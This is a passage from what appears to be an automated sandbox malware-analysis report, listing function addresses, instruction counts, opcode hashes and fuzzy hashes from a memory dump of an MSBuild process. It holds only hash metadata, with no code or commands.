                                                                                                                                                                                                                                                                  • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                                                  • Instruction ID: d2fe5fb47ade952552fe3489b6fc97e6fa14ac3b71c8bffa74cc3049b1b5836d
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6D017C72204584DFE726C61ED948F367BDCEB45798F0904B1F905CBAA1EA38DC40C661
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137826B Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: c57ea264024332b3c18c840ca525297a4631bfaa32a7eded839a1b5af8351bb6
                                                                                                                                                                                                                                                                  • Instruction ID: 83e28890690d5adadb36db5d198f844fb64f2d41e67523a489454b860ff1e4f4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: c57ea264024332b3c18c840ca525297a4631bfaa32a7eded839a1b5af8351bb6
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 87018F32600509DBD724EB6AD8489AABBB9EF90618B1540AAD901A76A4EE30DD01C691
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143F367 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0bab51910eefb1b00d033c04f1f3cba0db39dcff4ab733257daffc963d4e83fd
                                                                                                                                                                                                                                                                  • Instruction ID: e3c1ca927808b9f0f3916806d105e3839aad0b58b1f1f031bac92bea76018988
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0bab51910eefb1b00d033c04f1f3cba0db39dcff4ab733257daffc963d4e83fd
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: ED018F71A10258EBDB10EBA9D855FAFBBB8EF94704F00406AB901EB390E674DD01C794
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01382582 Relevance: .0, Instructions: 45COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 0683e94767b46adebd459bcf03252c30f57b12b15b9c89cd904684caea3aae70
                                                                                                                                                                                                                                                                  • Instruction ID: 28afca014725d2e63de24b282324775d1d69d72dd63d14a98f36c16799bbfea1
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0683e94767b46adebd459bcf03252c30f57b12b15b9c89cd904684caea3aae70
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E6F0F932641B10B7D7319B5A8C40F57BAADEB84B94F104029A60597640C630DD01CAB0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01455152 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 6904f2a92cb33b85411288cb6e30689e312d564c99d93001087a57b2bd23a20d
                                                                                                                                                                                                                                                                  • Instruction ID: 46d74e8d700c0e2f5adf8e90fff5c44608ed45f8eced3ad46b222596aac4e2b7
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 6904f2a92cb33b85411288cb6e30689e312d564c99d93001087a57b2bd23a20d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1F012CB1A10209ABDB00DFA9D9919EEBBF8FF58704F10405AE901EB351D634AA018BA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01455060 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f1ef06c75be125f17f6965b5ffb48af8f08b61dec9ec3f1d3b7eadc38849fb9c
                                                                                                                                                                                                                                                                  • Instruction ID: 6fb03400bc8f8cf65075e2d7c1a99a0e4800b1fe8cad5a2df251a5a01fbb09ef
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f1ef06c75be125f17f6965b5ffb48af8f08b61dec9ec3f1d3b7eadc38849fb9c
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 04012CB1A10219ABCB04DFA9D9919EEBBF8FF58714F10405AF901EB351D634AA018BA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013AC073 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                                                  • Instruction ID: 257b523a415747b2b59f447d79eb72ecfef73bb4c23869e7bf0235c2f9f6a7c0
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B5F0C2B2A00A11ABD324CF4DDC40E57FBEADBD1A84F058129A549CB220EA31ED04CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014550D9 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: ed6693156998d0af9f7f90a18586f9176d78635a155ee8e405dd4d0c78d53d22
                                                                                                                                                                                                                                                                  • Instruction ID: fee8d51d657fd80f616720eac8f29567a34e19b1046bc23ee2414779172f6925
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ed6693156998d0af9f7f90a18586f9176d78635a155ee8e405dd4d0c78d53d22
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AB0121B1A00209ABDB00DF69D9519EEBBF8FF59744F50405AE901F7351D6749D018BA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137C310 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                                                  • Instruction ID: b9b5c5e57c0552c1c338f0a7df4522624f66127470f6909bdfc05003cdadab60
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BBF02173204A339BF73316BD5840B7BB5998FD1A6CF191035F6099B600C96CCE0197D0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01455537 Relevance: .0, Instructions: 43COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: d1aa86da1760ae8f70724e64352af4037df12a10ed7e4d8c19be73d675c9b487
                                                                                                                                                                                                                                                                  • Instruction ID: 78396714088d593419022e0a9e7163875f9ff0aa7ed3dd84f2f5b4a26c028dbc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d1aa86da1760ae8f70724e64352af4037df12a10ed7e4d8c19be73d675c9b487
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 53111E70A1024ADFDB44DFA9D551BADBBF4FF08704F04426AE905EB392E634D941CB90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014561E5 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 08053e07c488375c44a83b7e6d1cec3dda0423f4a0ff234cc965271a963dc7a5
                                                                                                                                                                                                                                                                  • Instruction ID: a377cc2606d64b0e54f3a4ac2e5adfbd5a2b3796093a50bc0d6ba0bcc3c1e232
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 08053e07c488375c44a83b7e6d1cec3dda0423f4a0ff234cc965271a963dc7a5
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DF018F71A00249ABCB00DFADD851AEEBBF8FF58714F14405AF901AB390D734EA01CB95
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014063C0 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                                  • Instruction ID: 22029e5da03b307c8fff2d5876c1c61c229a1c03200d802136a82d3cb39945b4
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 35F01DB220001DBFEF029F95DD80DAF7B7EEB59298B114129FA1196160D635DD21ABA0
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143F2F8 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: a203efc49a3044eea1c9973a35d1472e401d7051d002da8b7c168cfebea297de
                                                                                                                                                                                                                                                                  • Instruction ID: 3bc9502ca49ca2484fad26856e6b8bab26000b8fa6d671aa6e830fbc6e358102
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: a203efc49a3044eea1c9973a35d1472e401d7051d002da8b7c168cfebea297de
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2F0C872F10248ABDB04DFBDC855AEEB7B8EF48714F00805AE501EB290DA74D9058791
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B724D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                                                                                                                  • Instruction ID: 168a0ef0dae4de1ac54c732c364e6d59c9772e99479b9227f4f284510371e48e
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 44620c8b90c707c3135ebb5afdba643e124f7b09bfea536c61b6b3c3b840e391
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 59F0FC71A013566BEF10D79D8580FEB7BA8DFD0618F084165BF019F981F630D940C750
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0137C0F0 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 4df351057d6b94bc0038454bcde2a7e2660a3f2c82da9984740b7a87a7e5df69
                                                                                                                                                                                                                                                                  • Instruction ID: 4f90e8e67c4a213f8ea7044ab10d1e6bc4013c2b8beb5c773b47461a89fb190b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 4df351057d6b94bc0038454bcde2a7e2660a3f2c82da9984740b7a87a7e5df69
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: FFF024723042429BF370961DAC01F22379AE7C4A5DF65903AEB098B6C1F978DC01C394
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014553FC Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: f8de1b8fa7958aebc9838ae35d3d703efa4b4c678466c342d410ef8e269ee21d
                                                                                                                                                                                                                                                                  • Instruction ID: ffbd7fdf65a2a62f362fd6d2ff9ac370b51146bd717d1f545500020352f14585
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: f8de1b8fa7958aebc9838ae35d3d703efa4b4c678466c342d410ef8e269ee21d
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA012170E0020ADFDB44DFA9D555B9EFBF4FF08304F14817AA919EB391E6349A418B90
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013B656A Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 84c4bd72fbd2f3f000883380f6e5f840f8819b12aec9d8c72c6e0d0f009c8136
                                                                                                                                                                                                                                                                  • Instruction ID: d940f2511c3d2d72630c2b7b5ce06e084572dafc59e76f368ee7dccacb5b5850
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 84c4bd72fbd2f3f000883380f6e5f840f8819b12aec9d8c72c6e0d0f009c8136
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: B10181B0205685DBE722972CCD89B6637A8AB40B4CF4841A6BB018BEE6F728D4118210
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0142437C Relevance: .0, Instructions: 37COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                                                  • Instruction ID: 75b6f07d964a97cf7066cad63dd106fb526f0f6e1f092d20c1d1e0a03696e982
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 55F0E93134193387EB36AA2ED420B2BA655EF90D00B4D052ED606CB7A0DF30DC918780
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 0143F3E6 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: bcd00771e27f450e16bc04935749db7d9d369f2dfa156db4989d3de6816d9722
                                                                                                                                                                                                                                                                  • Instruction ID: 3851a38d3acdc3729d4463722ed7623c87642140333f20a5f0741d2a3eeb7232
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: bcd00771e27f450e16bc04935749db7d9d369f2dfa156db4989d3de6816d9722
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 54F0A971E00209AFCB04EFACD545A9EBBF4FF68304F40806AB905EB391E634EA01CB54
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 013792FF Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 030da5cdc12246fd28ea945de73bbf59ddde14682d65dc631766f9240ff4a40a
                                                                                                                                                                                                                                                                  • Instruction ID: 9f12dc25a1b27983968a4b63ac6a151ff330c99e98cd56279f7c4935ef8e3e7b
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 030da5cdc12246fd28ea945de73bbf59ddde14682d65dc631766f9240ff4a40a
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A4F0F032100640ABE7319B19DC04F9ABBFDEF84728F08021CA546830A0C6A4E904C750
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 014555C9 Relevance: .0, Instructions: 35COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: 8339923115ed13554aaca88d7e7c238e997191d13cd744f957c74bc987d9bbad
                                                                                                                                                                                                                                                                  • Instruction ID: 7a594190ee80437df8d6553b3f0a1addaf058dd03bac8f4a175269f7db7a18bc
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 8339923115ed13554aaca88d7e7c238e997191d13cd744f957c74bc987d9bbad
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 69F04F74A00249AFDB04EFB8D555AAEB7F4FF18704F10845AB909EB391E674DA00CB64
                                                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                  Function 01440115 Relevance: .0, Instructions: 32COMMON
                                                                                                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                  • Source File: 00000005.00000002.1876999720.0000000001350000.00000040.00001000.00020000.00000000.sdmp, Offset: 01350000, based on PE: true
                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_5_2_1350000_MSBuild.jbxd
                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                  • API ID:
                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                  • API String ID:
                                                                                                                                                                                                                                                                  • Opcode ID: b0d974d21fa1a6ea6739f79aff86bc89537c0c4e59ca28072e4a76065dccae88
                                                                                                                                                                                                                                                                  • Instruction ID: 8cb381b031b7cd9aab052edae5ac02812b828ec84cf78aa0ff8b9377a648c9cf
                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: b0d974d21fa1a6ea6739f79aff86bc89537c0c4e59ca28072e4a76065dccae88
                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: AEF027A6415A814BFF326B3C64542D26B55A795010F0A144BD5A257339C5758893C320
                                                                                                                                                                                                                                                                  Uniqueness

